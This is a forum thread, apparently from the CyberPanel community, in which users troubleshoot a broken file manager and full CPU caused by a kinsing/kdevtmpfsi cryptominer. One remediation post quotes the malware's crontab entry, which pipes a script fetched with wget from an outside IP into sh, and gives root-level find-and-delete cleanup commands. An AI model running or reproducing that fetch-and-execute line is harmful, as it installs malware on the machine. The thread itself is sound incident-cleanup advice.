CyberPanel Community

Cant open file manager

La
Lanaya #1

hello , i cant open my file manager for any of my domain , it got same result . how to solve it , thanks

10 replies
vi
viludi #2

the same problem , no one has solution to this issue

vi
viludi #3

after 2 minute cpu reaches 100% , issue still exist

rl
rotonshikdar lin #4

check your server may have that recent security breach htop
check CPU usage 100% or not

La
Lanaya #5

helo guys , i found solution

  • log into SSH as root.
  • type : cyberpanel_utility
  • Type 1
    when u see CyberPanel Upgraded problem solved
La
Lanaya #6

normal for a day , next day same issue happend again

La
Lanaya #8

gini bro.

here it my solution to fix .

open ssh :

# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;

#crontab -e


and remove something like this 

* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

then

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
La
Lanaya #10

aftre that update your cyberpanel . its ok for me

Sign in to reply